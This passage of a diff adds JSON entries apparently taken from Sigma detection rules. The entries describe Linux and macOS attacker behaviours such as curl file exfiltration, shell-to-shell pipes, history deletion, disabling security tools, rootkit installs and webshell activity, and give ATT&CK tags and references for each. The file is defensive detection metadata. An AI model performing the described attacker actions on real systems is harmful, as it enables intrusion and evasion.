(Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "low", + "falsepositive": [ + "Any user deleting files that way." + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.", + "uuid": "067d8238-7127-451c-a9ec-fa78045b618b", + "value": "Linux Doas Tool Execution", + "meta": { + "refs": [ + "https://research.splunk.com/endpoint/linux_doas_tool_execution/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2022/01/20", + "filename": "proc_creation_lnx_doas_execution.yml", + "author": "Sittikorn S, Teoderick Contreras", + "level": "low", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects usage of system utilities to discover files and directories", + "uuid": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", + "value": "File and Directory Discovery - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_lnx_file_and_directory_discovery.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", + "uuid": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", + "value": "File Deletion", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_lnx_file_deletion.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", + "uuid": "78a80655-a51e-4669-bc6b-e9d206a462ee", + "value": "Install Root Certificate", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_lnx_install_root_certificate.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.", + "uuid": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", + "value": "Local System Accounts Discovery - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_account.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_lnx_local_account.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings", + "uuid": "676381a6-15ca-4d73-a9c8-6a22e970b90d", + "value": "Local Groups Discovery - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_groups.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2020/10/11", + "filename": "proc_creation_lnx_local_groups.yml", + "author": "\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects enumeration of local or remote network services.", + "uuid": "3e102cd9-a70d-4a7a-9508-403963092f31", + "value": "Linux Network Service Scanning", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2020/10/21", + "filename": "proc_creation_lnx_network_service_scanning.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", + "uuid": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", + "value": "Nohup Execution", + "meta": { + "refs": [ + "https://gtfobins.github.io/gtfobins/nohup/", + "https://en.wikipedia.org/wiki/Nohup", + "https://www.computerhope.com/unix/unohup.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" + ], + "tags": "No established tags", + "creation_date": "2022/06/06", + "filename": "proc_creation_lnx_nohup.yml", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "Administrators or installed processes that leverage nohup" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "uuid": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", + "value": "OMIGOD SCX RunAsProvider ExecuteScript", + "meta": { + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ], + "creation_date": "2021/10/15", + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "high", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider ExecuteScript." + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "uuid": "21541900-27a9-4454-9c4c-3f0a4240344a", + "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand", + "meta": { + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ], + "creation_date": "2021/10/15", + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "high", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", + "uuid": "4e2f5868-08d4-413d-899f-dc2f1508627b", + "value": "Process Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_lnx_process_discovery.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects setting proxy configuration", + "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", + "value": "Connection Proxy", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1090/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1090" + ], + "creation_date": "2020/06/17", + "filename": "proc_creation_lnx_proxy_connection.yml", + "author": "\u00d6mer G\u00fcnal", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects python spawning a pretty tty", + "uuid": "c4042d54-110d-45dd-a0e1-05c47822c937", + "value": "Python Spawning Pretty TTY", + "meta": { + "refs": [ + "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/06/03", + "filename": "proc_creation_lnx_python_pty_spawn.yml", + "author": "Nextron Systems", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects the enumeration of other remote systems.", + "uuid": "11063ec2-de63-4153-935e-b1a8b9e616f1", + "value": "Linux Remote System Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ], + "creation_date": "2020/10/22", + "filename": "proc_creation_lnx_remote_system_discovery.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", + "uuid": "6b14bac8-3e3a-4324-8109-42f0546a347f", + "value": "Scheduled Cron Task/Job - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.003" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_lnx_schedule_task_job_cron.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", + "uuid": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", + "value": "Security Software Discovery - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_lnx_security_software_discovery.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects disabling security tools", + "uuid": "e3a8a052-111f-4606-9aee-f28ebeb76776", + "value": "Disabling Security Tools", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2020/06/17", + "filename": "proc_creation_lnx_security_tools_disabling.yml", + "author": "\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", + "uuid": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", + "value": "Disable Or Stop Services", + "meta": { + "refs": [ + "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_lnx_services_stop_and_disable.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious change of file privileges with chown and chmod commands", + "uuid": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", + "value": "Setuid and Setgid", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", + "https://attack.mitre.org/techniques/T1548/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2020/06/16", + "filename": "proc_creation_lnx_setgid_setuid.yml", + "author": "\u00d6mer G\u00fcnal", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "uuid": "f74107df-b6c6-4e80-bf00-4170b658162b", + "value": "Sudo Privilege Escalation CVE-2019-14287", + "meta": { + "refs": [ + "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://access.redhat.com/security/cve/cve-2019-14287", + "https://twitter.com/matthieugarin/status/1183970598210412546", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" + ], + "creation_date": "2019/10/15", + "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects chmod targeting files in abnormal directory paths.", + "uuid": "6419afd1-3742-47a5-a7e6-b50386cd15f8", + "value": "Chmod Suspicious Directory", + "meta": { + "refs": [ + "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ], + "creation_date": "2022/06/03", + "filename": "proc_creation_lnx_susp_chmod_directories.yml", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "Admin changing file permissions." + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects a suspicious curl process start the adds a file to a web request", + "uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582", + "value": "Suspicious Curl File Upload - Linux", + "meta": { + "refs": [ + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://curl.se/docs/manpage.html", + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567", + "attack.t1105" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_lnx_susp_curl_fileupload.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Scripts created by developers and admins" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects a suspicious curl process start on linux with set useragent options", + "uuid": "b86d356d-6093-443d-971c-9b07db583c68", + "value": "Suspicious Curl Change User Agents - Linux", + "meta": { + "refs": [ + "https://curl.se/docs/manpage.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2022/09/15", + "filename": "proc_creation_lnx_susp_curl_useragent.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity", + "uuid": "1182f3b3-e716-4efa-99ab-d2685d04360f", + "value": "History File Deletion", + "meta": { + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565.001" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_lnx_susp_history_delete.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", + "uuid": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", + "value": "Print History File Contents", + "meta": { + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_lnx_susp_history_recon.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", + "uuid": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", + "value": "Interactive Bash Suspicious Children", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml" + ], + "tags": "No established tags", + "creation_date": "2022/03/14", + "filename": "proc_creation_lnx_susp_interactive_bash.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate software that uses these patterns" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects java process spawning suspicious children", + "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892", + "value": "Suspicious Java Children Processes", + "meta": { + "refs": [ + "https://www.tecmint.com/different-types-of-linux-shells/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/06/03", + "filename": "proc_creation_lnx_susp_java_children.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", + "uuid": "880973f3-9708-491c-a77b-2a35a1921158", + "value": "Linux Shell Pipe to Shell", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ], + "creation_date": "2022/03/14", + "filename": "proc_creation_lnx_susp_pipe_shell.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate software that uses these patterns" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", + "uuid": "0cf7a157-8879-41a2-8f55-388dd23746b7", + "value": "Linux Recon Indicators", + "meta": { + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004", + "attack.credential_access", + "attack.t1552.001" + ], + "creation_date": "2022/06/20", + "filename": "proc_creation_lnx_susp_recon_indicators.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects system information discovery commands", + "uuid": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", + "value": "System Information Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_lnx_system_info_discovery.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects usage of system utilities to discover system network connections", + "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", + "value": "System Network Connections Discovery - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_lnx_system_network_connections_discovery.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects enumeration of local network configuration", + "uuid": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", + "value": "System Network Discovery - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_lnx_system_network_discovery.yml", + "author": "\u00d6mer G\u00fcnal and remotephone, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects execution of a the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges", + "uuid": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e", + "value": "Triple Cross eBPF Rootkit Execve Hijack", + "meta": { + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "creation_date": "2022/07/05", + "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", + "uuid": "22236d75-d5a0-4287-bf06-c93b1770860f", + "value": "Triple Cross eBPF Rootkit Install Commands", + "meta": { + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1014" + ], + "creation_date": "2022/07/05", + "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious sub processes of web server processes", + "uuid": "818f7b24-0fba-4c49-a073-8b755573b9c7", + "value": "Linux Webshell Indicators", + "meta": { + "refs": [ + "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", + "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2021/10/15", + "filename": "proc_creation_lnx_webshell_detection.yml", + "author": "Florian Roth, Nasreddine Bencherchali (update)", + "level": "high", + "falsepositive": [ + "Web applications that invoke Linux command line tools" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.", + "uuid": "23c43900-e732-45a4-8354-63e4a6c187ce", + "value": "MacOS Emond Launch Daemon", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", + "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.014" + ], + "creation_date": "2020/10/23", + "filename": "file_event_macos_emond_launch_daemon.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "file_event", + "logsource.product": "macos" + } + }, + { + "description": "Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence.", + "uuid": "dfe8b941-4e54-4242-b674-6b613d521962", + "value": "Startup Items", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md", + 